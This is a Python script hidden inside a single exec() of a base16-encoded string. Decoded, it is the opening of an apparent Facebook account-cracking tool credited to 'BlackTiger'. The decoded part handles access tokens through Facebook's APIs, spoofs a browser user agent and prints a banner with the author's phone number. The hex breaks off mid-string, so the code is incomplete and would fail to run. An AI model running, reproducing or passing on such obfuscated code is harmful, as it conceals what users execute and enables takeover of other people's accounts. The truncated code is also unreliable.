    def run_manager(self, event=None):
        """Start the worker thread; no-op if one is already running."""
        if self.is_running:
            # prevent multiple threads
            return
        # flip the button into its "Stop" persona
        self.button_run["text"] = "Stop"
        self.button_run["command"] = self.stop_manager # set command
        self.master.bind("<Return>", self.stop_manager) # bind return key
        # set switches
        self.is_running = True
        self.thread_stop_event.clear()
        # create thread
        self.new_thread()
    def stop_manager(self, event=None):
        """Signal the worker thread to stop and restore the idle UI."""
        # flip the button back to its "Run" persona
        self.button_run["text"] = "Run"
        self.button_run["command"] = self.run_manager # set command
        self.master.bind("<Return>", self.run_manager) # bind return key
        # show logo image again
        logo_image = Image.open(cStringIO.StringIO(base64.b64decode(opt["logo_image_source"])))
        self.preview_image = ImageTk.PhotoImage(logo_image)
        self.view_canvas.create_image((logo_image.size[0]/2,
                                       logo_image.size[1]/2),
                                      image=self.preview_image)
        # set switches (the worker checks thread_stop_event between passes)
        self.is_running = False
        self.thread_stop_event.set()
    def new_thread(self):
        """Spawn the psd2png worker thread."""
        self.thread = threading.Thread(target=psd2png, args=[self, self.thread_stop_event])
        self.thread.start()
        print("[-] Running thread: ", self.thread.getName())
    def quit(self, event=None):
        """Stop the worker and tear down the Tk main loop."""
        # terminate thread
        self.thread_stop_event.set()
        # terminate application
        self.master.quit()
# if this code is starting point,
# script entry point: build the Tk window and hand it to tkApp
if __name__ == "__main__":
    """
    application starts here
    """
    # root window
    master = Tk()
    master.wm_title("PSD-2-PNG")
    # pin the window size (min == max makes it non-resizable)
    master.minsize(opt["app_options"]["width"], opt["app_options"]["height"])
    master.maxsize(opt["app_options"]["width"], opt["app_options"]["height"])
    app = tkApp(master)
    master.mainloop()
| 392.795652
| 89,589
| 0.944185
| 7,413
| 180,686
| 22.982733
| 0.649535
| 0.036062
| 0.039443
| 0.033809
| 0.233244
| 0.220495
| 0.210294
| 0.205458
| 0.19508
| 0.185184
| 0
| 0.156633
| 0.010228
| 180,686
| 459
| 89,590
| 393.651416
| 0.796022
| 0.008495
| 0
| 0.178862
| 0
| 0.012195
| 0.961579
| 0.951782
| 0
| 1
| 0
| 0
| 0
| 0
| null | null | 0.00813
| 0.020325
| null | null | 0.02439
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
670742b437eeb0ea3efda9da405c52d7c8ade644
| 7,831
|
py
|
Python
|
test/commands/extended/find_transaction_objects_test.py
|
EasonC13/iota.py
|
f596c1ac0d9bcbceda1cf6109cd921943a6599b3
|
[
"MIT"
] | 347
|
2016-12-23T14:28:06.000Z
|
2019-09-30T13:46:30.000Z
|
test/commands/extended/find_transaction_objects_test.py
|
EasonC13/iota.py
|
f596c1ac0d9bcbceda1cf6109cd921943a6599b3
|
[
"MIT"
] | 194
|
2016-12-22T21:22:47.000Z
|
2019-10-01T09:01:16.000Z
|
test/commands/extended/find_transaction_objects_test.py
|
EasonC13/iota.py
|
f596c1ac0d9bcbceda1cf6109cd921943a6599b3
|
[
"MIT"
] | 147
|
2017-01-08T13:14:47.000Z
|
2019-10-01T22:27:31.000Z
|
from unittest import TestCase
from iota import Iota, AsyncIota, MockAdapter, Transaction
from iota.commands.extended import FindTransactionObjectsCommand
from iota.adapter import async_return
from test import patch, MagicMock, mock, async_test
class FindTransactionObjectsCommandTestCase(TestCase):
    """Tests for FindTransactionObjectsCommand and its API wire-up."""

    def setUp(self):
        super(FindTransactionObjectsCommandTestCase, self).setUp()

        self.adapter = MockAdapter()
        self.command = FindTransactionObjectsCommand(self.adapter)

        # Define values that we can reuse across tests.
        self.address = 'A' * 81
        self.transaction_hash = \
            b'BROTOVRCAEMFLRWGPVWDPDTBRAMLHVCHQDEHXLCWH' \
            b'KKXLVDFCPIJEUZTPPFMPQQ9KOHAEUAMMVJN99999'
        self.trytes = \
            b'99999999999999999999999999999999999999999999999999999999999999' \
            b'99999999999999999999999999999999999999999999999999999999999999' \
            b'99999999999999999999999999999999999999999999999999999999999999' \
            b'99999999999999999999999999999999999999999999999999999999999999' \
            b'99999999999999999999999999999999999999999999999999999999999999' \
            b'99999999999999999999999999999999999999999999999999999999999999' \
            b'99999999999999999999999999999999999999999999999999999999999999' \
            b'99999999999999999999999999999999999999999999999999999999999999' \
            b'99999999999999999999999999999999999999999999999999999999999999' \
            b'99999999999999999999999999999999999999999999999999999999999999' \
            b'99999999999999999999999999999999999999999999999999999999999999' \
            b'99999999999999999999999999999999999999999999999999999999999999' \
            b'99999999999999999999999999999999999999999999999999999999999999' \
            b'99999999999999999999999999999999999999999999999999999999999999' \
            b'99999999999999999999999999999999999999999999999999999999999999' \
            b'99999999999999999999999999999999999999999999999999999999999999' \
            b'99999999999999999999999999999999999999999999999999999999999999' \
            b'99999999999999999999999999999999999999999999999999999999999999' \
            b'99999999999999999999999999999999999999999999999999999999999999' \
            b'99999999999999999999999999999999999999999999999999999999999999' \
            b'99999999999999999999999999999999999999999999999999999999999999' \
            b'99999999999999999999999999999999999999999999999999999999999999' \
            b'99999999999999999999999999999999999999999999999999999999999999' \
            b'99999999999999999999999999999999999999999999999999999999999999' \
            b'99999999999999999999999999999999999999999999999999999999999999' \
            b'99999999999999999999999999999999999999999999999999999999999999' \
            b'99999999999999999999999999999999999999999999999999999999999999' \
            b'99999999999999999999999999999999999999999999999999999999999999' \
            b'99999999999999999999999999999999999999999999999999999999999999' \
            b'99999999999999999999999999999999999999999999999999999999999999' \
            b'99999999999999999999999999999999999999999999999999999999999999' \
            b'99999999999999999999999999999999999999999999999999999999999999' \
            b'99999999999999999999999999999999999999999999999999999999999999' \
            b'99999999999999999999999999999999999999999999999999999999999999' \
            b'99999999999999999999999999999999999999999999999999999999999999' \
            b'99999999999999999AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' \
            b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA99999999999999999999999999' \
            b'9QC9999999999999999999999999PQYJHAD99999999999999999999WHIUDFV' \
            b'IFXNBJVEHYPLDADIDINGAWMHYIJNPYUDWXCAWL9GSKTUIZLJGGFIXEIYTJEDQZ' \
            b'TIYRXHC9PBWBDSOTEJTQTYYSZLVTFLDQMZSGLHKLYVJOLMXIJJRTGS9RYBXLAT' \
            b'ZJXBVBCPUGWRUKZJYLBGPKRKWIA9999FPYHMFFWMMKOHTSAPMMATZQLWXJSPMT' \
            b'JSRQIPMDCQXFFMXMHCYDKVJCFSRECAVALCOFIYCJLNRZZZ9999999999999999' \
            b'999999999999999KITCXNZOF999999999MMMMMMMMMEA9999F9999999999999' \
            b'9999999'

    def test_wireup(self):
        """
        Verify that the command is wired up correctly. (sync)

        The API method indeed calls the appropriate command.
        """
        # NOTE: the original file defined this exact test twice; the second
        # definition silently shadowed the first, so one copy was removed.
        with patch('iota.commands.extended.find_transaction_objects.FindTransactionObjectsCommand.__call__',
                   MagicMock(return_value=async_return('You found me!'))
                   ) as mocked_command:
            api = Iota(self.adapter)

            # Don't need to call with proper args here.
            response = api.find_transaction_objects('bundle')

            self.assertTrue(mocked_command.called)
            self.assertEqual(
                response,
                'You found me!'
            )

    @async_test
    async def test_wireup_async(self):
        """
        Verify that the command is wired up correctly. (async)

        The API method indeed calls the appropriate command.
        """
        with patch('iota.commands.extended.find_transaction_objects.FindTransactionObjectsCommand.__call__',
                   MagicMock(return_value=async_return('You found me!'))
                   ) as mocked_command:
            api = AsyncIota(self.adapter)

            # Don't need to call with proper args here.
            response = await api.find_transaction_objects('bundle')

            self.assertTrue(mocked_command.called)
            self.assertEqual(
                response,
                'You found me!'
            )

    @async_test
    async def test_transaction_found(self):
        """
        A transaction is found with the inputs. A transaction object is
        returned.
        """
        with mock.patch(
            'iota.commands.core.find_transactions.FindTransactionsCommand.'
            '_execute',
            mock.Mock(return_value=async_return({'hashes': [self.transaction_hash, ]})),
        ):
            with mock.patch(
                'iota.commands.core.get_trytes.GetTrytesCommand._execute',
                mock.Mock(return_value=async_return({'trytes': [self.trytes, ]})),
            ):
                response = await self.command(addresses=[self.address])

                self.assertEqual(len(response['transactions']), 1)
                transaction = response['transactions'][0]
                self.assertIsInstance(transaction, Transaction)
                self.assertEqual(transaction.address, self.address)

    @async_test
    async def test_no_transactions_found(self):
        """
        No transaction is found with the inputs. An empty list is returned.
        """
        with mock.patch(
            'iota.commands.core.find_transactions.FindTransactionsCommand.'
            '_execute',
            mock.Mock(return_value=async_return({'hashes': []})),
        ):
            response = await self.command(addresses=[self.address])

            self.assertDictEqual(
                response,
                {
                    'transactions': [],
                },
            )
| 45.005747
| 108
| 0.68829
| 514
| 7,831
| 10.361868
| 0.210117
| 0.414007
| 0.420578
| 0.804356
| 0.733196
| 0.729253
| 0.712167
| 0.70522
| 0.687195
| 0.679309
| 0
| 0.396476
| 0.246329
| 7,831
| 173
| 109
| 45.265896
| 0.50593
| 0.049291
| 0
| 0.634146
| 0
| 0
| 0.476299
| 0.451604
| 0
| 0
| 0
| 0
| 0.081301
| 1
| 0.02439
| false
| 0
| 0.04065
| 0
| 0.073171
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
673dcfa9bf37a62ae245a6ffa9c45242dd761b43
| 2,820
|
py
|
Python
|
vyapp/plugins/pane_jumps.py
|
iogf/vy
|
4ba0d379e21744fd79a740e8aeaba3a0a779973c
|
[
"MIT"
] | 927
|
2015-02-22T17:34:21.000Z
|
2018-03-23T07:26:17.000Z
|
vyapp/plugins/pane_jumps.py
|
iogf/vy
|
4ba0d379e21744fd79a740e8aeaba3a0a779973c
|
[
"MIT"
] | 22
|
2015-09-02T19:20:22.000Z
|
2018-02-13T16:41:02.000Z
|
vyapp/plugins/pane_jumps.py
|
iogf/vy
|
4ba0d379e21744fd79a740e8aeaba3a0a779973c
|
[
"MIT"
] | 53
|
2015-09-02T12:26:32.000Z
|
2018-01-18T09:11:30.000Z
|
"""
Overview
========
Commands
========
"""
from vyapp.areavi import AreaVi
from vyapp.app import root
class PaneJumps:
    """Move keyboard focus between split panes.

    Bound to <Control-Alt-h/l/k/j> for left/right/up/down jumps. Each
    handler focuses the AreaVi inside the neighbouring pane (wrapping
    around at the edges) and returns 'break' to stop further event
    processing.

    The four public jump_* handlers previously duplicated the same
    lookup/focus logic four times; it is factored into private helpers
    with behavior unchanged.
    """

    def __init__(self, area):
        self.area = area
        area.install('splits',
                     (-1, '<Control-Alt-h>', self.jump_left),
                     (-1, '<Control-Alt-l>', self.jump_right),
                     (-1, '<Control-Alt-k>', self.jump_up),
                     (-1, '<Control-Alt-j>', self.jump_down))

    def _focus_areavi(self, wid):
        """Give focus to the AreaVi child of the pane widget *wid*."""
        areas = [child for child in wid.winfo_children()
                 if isinstance(child, AreaVi)]
        # as there is only one.
        areas[0].focus_set()

    def _jump_horizontal(self, step):
        """Focus the pane *step* positions away in this row, wrapping."""
        wids = [str(item) for item in self.area.master.master.panes()]
        # modulo wraps both directions — identical to the original's
        # negative-index wrap for step == -1
        count = (wids.index(str(self.area.master)) + step) % len(wids)
        self._focus_areavi(self.area.nametowidget(wids[count]))
        return 'break'

    def _jump_vertical(self, step):
        """Focus the pane in the row *step* rows away, keeping the column."""
        row = [str(item) for item in self.area.master.master.panes()]
        index = row.index(str(self.area.master))
        rows = [str(item) for item in self.area.master.master.master.panes()]
        count = (rows.index(str(self.area.master.master)) + step) % len(rows)
        target_row = self.area.nametowidget(rows[count])
        size = len(target_row.panes())
        # clamp to the last pane when the target row has fewer panes
        pane = target_row.panes()[index if index < size else (size - 1)]
        self._focus_areavi(self.area.nametowidget(pane))
        return 'break'

    def jump_left(self, event):
        return self._jump_horizontal(-1)

    def jump_right(self, event):
        return self._jump_horizontal(1)

    def jump_up(self, event):
        return self._jump_vertical(-1)

    def jump_down(self, event):
        return self._jump_vertical(1)

install = PaneJumps
| 29.375
| 56
| 0.549291
| 364
| 2,820
| 4.200549
| 0.159341
| 0.104644
| 0.109876
| 0.104644
| 0.83257
| 0.83257
| 0.83257
| 0.83257
| 0.83257
| 0.83257
| 0
| 0.007231
| 0.313475
| 2,820
| 95
| 57
| 29.684211
| 0.782541
| 0.044681
| 0
| 0.761905
| 0
| 0
| 0.032078
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.079365
| false
| 0
| 0.031746
| 0
| 0.190476
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
675f2dc47aa969ef6afc24f3eb179d5211cca72e
| 92,055
|
py
|
Python
|
Taqbirlove.py
|
TeamOfDarkroom/Taqbirlov
|
e0c061a16a997bd689d7de9639ddc947e2b5511c
|
[
"Apache-2.0"
] | 3
|
2020-10-30T13:09:18.000Z
|
2021-05-13T06:15:17.000Z
|
Taqbirlove.py
|
TeamOfDarkroom/Taqbirlov
|
e0c061a16a997bd689d7de9639ddc947e2b5511c
|
[
"Apache-2.0"
] | 1
|
2020-08-25T12:10:57.000Z
|
2020-08-25T12:10:57.000Z
|
Taqbirlove.py
|
TeamOfDarkroom/Taqbirlov
|
e0c061a16a997bd689d7de9639ddc947e2b5511c
|
[
"Apache-2.0"
] | 7
|
2020-08-27T16:31:15.000Z
|
2022-01-29T23:37:21.000Z
|
import base64
exec(base64.b16decode('23212F7573722F62696E2F707974686F6E320A23636F64696E673D7574662D380A235468652043726564697420466F72205468697320436F646520476F657320546F20426C61636B54696765722D4572726F723430340A23496620596F752057616E6E612054616B65204372656469747320466F72205468697320436F64652C20506C65617365204C6F6F6B20596F757273656C6620416761696E2E2E2E0A235265736572766564323032300A0A0A696D706F7274206F732C7379732C74696D652C6461746574696D652C72616E646F6D2C686173686C69622C72652C746872656164696E672C6A736F6E2C75726C6C69622C636F6F6B69656C69622C72657175657374732C6D656368616E697A650A66726F6D206D756C746970726F63657373696E672E706F6F6C20696D706F727420546872656164506F6F6C0A66726F6D2072657175657374732E657863657074696F6E7320696D706F727420436F6E6E656374696F6E4572726F720A66726F6D206D656368616E697A6520696D706F72742042726F777365720A0A0A72656C6F616428737973290A7379732E73657464656661756C74656E636F64696E6728277574663827290A6272203D206D656368616E697A652E42726F7773657228290A62722E7365745F68616E646C655F726F626F74732846616C7365290A62722E7365745F68616E646C655F72656672657368286D656368616E697A652E5F687474702E485454505265667265736850726F636573736F7228292C6D61785F74696D653D31290A62722E61646468656164657273203D205B2827557365722D4167656E74272C20274F706572612F392E38302028416E64726F69643B204F70657261204D696E692F33322E302E323235342F38352E20553B206964292050726573746F2F322E31322E3432332056657273696F6E2F31322E313627295D0A0A0A646566206B656C75617228293A0A097072696E7420225C7831625B313B39316D45786974220A096F732E7379732E6578697428290A0A0A646566206163616B2862293A0A2020202077203D2027616874647A6A63270A2020202064203D2027270A20202020666F72206920696E20783A0A202020202020202064202B3D202721272B775B72616E646F6D2E72616E64696E7428302C6C656E2877292D31295D2B690A2020202072657475726E20636574616B2864290A0A0A64656620636574616B2862293A0A2020202077203D2027616874647A6A63270A20202020666F72206920696E20773A0A20202020202020206A203D20772E696E6465782869290A2020202020202020783D20782E7265706C61636528272125732725692C275C3033335B25733B316D272573747228333
12B6A29290A2020202078202B3D20275C3033335B306D270A2020202078203D20782E7265706C61636528272130272C275C3033335B306D27290A202020207379732E7374646F75742E777269746528782B275C6E27290A0A0A646566206A616C616E287A293A0A09666F72206520696E207A202B20275C6E273A0A09097379732E7374646F75742E77726974652865290A09097379732E7374646F75742E666C75736828290A090974696D652E736C65657028302E3035290A64656620746F6B656E7A28293A0A096F732E73797374656D2827636C65617227290A097072696E74206C6F676F0A09746F6B6574203D207261775F696E70757428225C3033335B313B39376D5B2B5D20546F6B656E203A22290A097472793A0A09096F7477203D2072657175657374732E676574282768747470733A2F2F67726170682E66616365626F6F6B2E636F6D2F6D653F6163636573735F746F6B656E3D272B746F6B6574290A090961203D206A736F6E2E6C6F616473286F74772E74657874290A09096E616D61203D20615B276E616D65275D0A09097A656464203D206F70656E28226C6F67696E2E747874222C20277727290A09097A6564642E777269746528746F6B6574290A09097A6564642E636C6F736528290A09096D656E7528290A09657863657074204B65794572726F723A0A09097072696E7420225C3033335B313B39316D5B215D2057726F6E67220A090965203D207261775F696E70757428225C3033335B313B39316D5B3F5D205C3033335B313B39326D57616E7420746F207069636B20757020746F6B656E3F5C3033335B313B39376D5B792F6E5D3A2022290A090969662065203D3D22223A0A0909096B656C75617228290A0909656C69662065203D3D2279223A0A0909096C6F67696E28290A0909656C73653A0A0909096B656C75617228290A0A646566206765742864617461293A0A097072696E7420275B2A5D2047656E65726174652061636365737320746F6B656E20270A0A097472793A0A09096F732E6D6B6469722827636F6F6B696527290A09657863657074204F534572726F723A0A0909706173730A0A0962203D206F70656E2827636F6F6B69652F746F6B656E2E6C6F67272C277727290A097472793A0A090972203D2072657175657374732E676574282768747470733A2F2F6170692E66616365626F6F6B2E636F6D2F726573747365727665722E706870272C706172616D733D64617461290A090961203D206A736F6E2E6C6F61647328722E74657874290A0A0909622E777269746528615B276163636573735F746F6B656E275D290A0909622E636C6F736528290A09097072696E7420275B2A5D207375636365737366756C6C792067656E657261746
52061636365737320746F6B656E270A09097072696E7420275B2A5D20596F75722061636365737320746F6B656E2069732073746F72656420696E20636F6F6B69652F746F6B656E2E6C6F67270A09096D656E7528290A09657863657074204B65794572726F723A0A09097072696E7420275B215D204661696C656420746F2067656E65726174652061636365737320746F6B656E270A09097072696E7420275B215D20436865636B20796F757220636F6E6E656374696F6E202F20656D61696C206F722070617373776F7264270A09096F732E72656D6F76652827636F6F6B69652F746F6B656E2E6C6F6727290A09096D656E7528290A096578636570742072657175657374732E657863657074696F6E732E436F6E6E656374696F6E4572726F723A0A09097072696E7420275B215D204661696C656420746F2067656E65726174652061636365737320746F6B656E270A09097072696E7420275B215D20436F6E6E656374696F6E206572726F7220212121270A09096F732E72656D6F76652827636F6F6B69652F746F6B656E2E6C6F6727290A09096D656E7528290A0A6465662070686F6E6528293A0A09676C6F62616C20746F6B65740A096F732E73797374656D2827636C65617227290A097472793A0A0909746F6B65743D6F70656E28276C6F67696E2E747874272C277227292E7265616428290A0965786365707420494F4572726F723A0A09097072696E74225C7831625B313B39346D546F6B656E20696E76616C6964220A09096F732E73797374656D2827726D202D7266206C6F67696E2E74787427290A090974696D652E736C6565702831290A09096C6F67696E28290A096F732E73797374656D2827636C656172272909090A0A234465763A426C61636B54696765722D4572726F723430340A2323232323204C4F474F2023232323230A6C6F676F203D202222220A0A5C3033335B313B39316DE29480E29480E29480E29480E29480E29480E29480E29480E29480E29688E29688E29688E29688E296880A5C3033335B313B39326DE29480E29480E29480E29480E29480E29480E29480E29480E29688E29688E29688E29688E29688E29688E29688E29688E29480E29480E29480E29688E29688E29688E29688E296880A5C3033335B313B39336DE29480E29480E29480E29480E29480E29480E29480E29480E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E296880A5C3033335B313B39346DE29480E29480E29480E29480E29480E29480E29480E29480E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E2968
8E29688E29688E296880A5C3033335B313B39356DE29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E296880A5C3033335B313B39366DE29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E296880A5C3033335B313B39376DE29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E296880A5C3033335B313B39376DE29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E296880A5C3033335B313B39366DE29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E296880A5C3033335B313B39356DE29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29688E29688E29688E29480E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E296880A5C3033335B313B39346DE29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29688E29688E29688E29480E29480E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E296880A5C3033335B313B39336DE29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29688E29688E29688E29480E29480E29480E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E296880A5C3033335B313B39326DE29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29688E29688E29688E29480E29480E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E296880A5C3033335B313B393
16DE29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29688E29688E29688E29480E29480E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E296880A5C3033335B313B39316DE29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29688E29688E29688E29480E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E296880A5C3033335B313B39326DE29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29688E29688E29688E29480E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E296880A5C3033335B313B39336DE29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29688E29688E29480E29480E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E296880A5C3033335B313B39346DE29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29688E29688E29480E29688E29688E29688E29688E29688E29688E29688E29480E29480E29688E29688E29688E29688E29688E296880A5C3033335B313B39356DE29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29480E29480E29480E29480E29688E29688E29688E29688E296880A5C3033335B313B39366DE29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29688E29688E29688E29480E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29480E29480E29480E29480E29480E29688E29688E29688E29688E296880A5C3033335B313B39376DE29480E29480E29480E29480E29480E29688E29688E29688E29480E29688E29688E29688E29688E29688E29688E29688E29688E29688E29480E29688E29688E29688E29688E29688E29480E29480E29480E29480E29480E29480E29688E29688E29688E29688E296880A5C3033335B313B39376DE29480E29480E29480E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29480E29688E29480E29480E29688E29688E29688E29688E29688E29480E29480E29480E29480E29480E29480E29
480E29688E29688E29688E296880A5C3033335B313B39366DE29480E29480E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29480E29480E29480E29480E29688E29688E29688E29688E29688E29480E29480E29480E29480E29480E29480E29480E29688E29688E29688E29688E296880A5C3033335B313B39356DE29480E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29480E29480E29480E29480E29688E29688E29688E29688E29480E29480E29480E29480E29480E29480E29480E29688E29688E29688E29688E296880A5C3033335B313B39346DE29480E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29480E29480E29480E29480E29688E29688E29688E29688E29480E29480E29480E29480E29480E29480E29480E29480E29688E29688E29688E29688E296880A5C3033335B313B39336DE29480E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29480E29480E29480E29480E29480E29480E29480E29688E29688E29688E29688E29480E29480E29480E29480E29480E29480E29480E29480E29688E29688E29688E29688E296880A5C3033335B313B39326DE29480E29480E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29480E29480E29480E29480E29480E29480E29480E29480E29688E29688E29688E29688E29480E29480E29480E29480E29480E29480E29480E29480E29480E29688E29688E29688E296880A5C3033335B313B39316DE29480E29480E29480E29688E29688E29688E29688E29688E29688E29688E29688E29480E29480E29480E29480E29480E29480E29480E29480E29480E29688E29688E29688E29688E29688E29480E29480E29480E29480E29480E29480E29480E29480E29688E29688E29688E29688E296880A5C3033335B313B39326DE29480E29480E29480E29480E29480E29688E29688E29688E29688E29688E29480E29480E29480E29480E29480E29480E29480E29480E29480E29688E29688E29688E29688E29688E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29688E29688E29688E296880A5C3033335B313B39336DE29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29688E29688E29688E29688E29688E29688E29688E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29688E29688E29688E296880A5C3033335B313
B39346DE29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29688E29688E29688E29688E29688E29688E2968820200A5C3033335B313B39316DE280A2E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E280A20A5C3033335B313B39316DE29688E29688E29688E29688E29688E29688E295972020202020E29688E29688E29688E29688E29688E29688E29688E29688E29597E29688E29688E2959720E29688E29688E29688E29688E29688E29688E2959720E29688E29688E29688E29688E29688E29688E29688E29597E29688E29688E29688E29688E29688E29688E29597200A5C3033335B313B39326DE29688E29688E29594E29590E29590E29688E29688E2959720202020E2959AE29590E29590E29688E29688E29594E29590E29590E2959DE29688E29688E29591E29688E29688E29594E29590E29590E29590E29590E2959D20E29688E29688E29594E29590E29590E29590E29590E2959DE29688E29688E29594E29590E29590E29688E29688E295970A5C3033335B313B39336DE29688E29688E29688E29688E29688E29688E29594E2959D20202020202020E29688E29688E29591202020E29688E29688E29591E29688E29688E295912020E29688E29688E29688E29597E29688E29688E29688E29688E29688E295972020E29688E29688E29688E29688E29688E29688E29594E2959D0A5C3033335B313B39346DE29688E29688E29594E29590E29590E29688E29688E2959720202020202020E29688E29688E29591202020E29688E29688E29591E29688E29688E29591202020E29688E29688E29591E29688E29688E29594E29590E29590E2959D2020E29688E29688E29594E29590E29590E29688E29688E295970A5C3033335B313B39356DE29688E29688E29688E29688E29688E29688E29594E2959D20202020202020E29688E29688E29591202020E29688E29688E29591E2959AE29688E29688E29688E29688E29688E29688E29594E2959DE29688E29688E29688E29688E29688E29688E29688E29597E29688E29688E295912020E29688E29688E295910A5C3033335B313B39366DE2959AE29590E29590E29590E29590E29590E2959D2020202020202020E2959AE29590E2959D202020E2959AE29590E2959D20E2959AE29590E29590E29590E29590E29590E2959D20E2959AE29590E29590E29590E29590E29
590E29590E2959DE2959AE29590E2959D2020E2959AE29590E2959D200A5C3033335B313B39316DE280A2E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E280A20A5C3033335B313B39376DE280A22D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D5C3033335B313B33376D424C41434B5F54494745525C3033335B313B39376D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2DE280A20A205C3033335B313B39376DE280A2E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E296850A5C3033335B313B34316D5C3033335B313B33376D5BE29AA1E29AA15C3033335B313B33376D417574686F72204E616D653A20426C61636B5F546967657220E29AA1E29AA15C3033335B313B33376D5D5C3033335B313B306D0A5C3033335B313B34316D5C3033335B313B33376D5BE29AA1E29AA15C3033335B313B33376DE2988F20E286922B39323330333733333531313420E29AA1E29AA15C3033335B313B33376D5D5C3033335B313B306D0A5C3033335B313B34316D5C3033335B313B33376D5BE29AA1E29AA15C3033335B313B33376D5954204368616E6E616C3A54696D653420596F7520E29AA1E29AA15C3033335B313B33376D5D5C3033335B313B306D0A5C3033335B313B34316D5C3033335B313B33376D5BE29AA1E29AA1205C3033335B313B33376D46726F6D3A2050616B697374616E20E29AA1E29AA15C3033335B313B33376D5D5C3033335B313B306D0A5C3033335B313B39376DE280A2E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E296850A5C3033335B313B39376DE280A22D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D5C3033335B313B33376D424C41434B5F54494745525C3033335B313B39376D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2DE280A20A2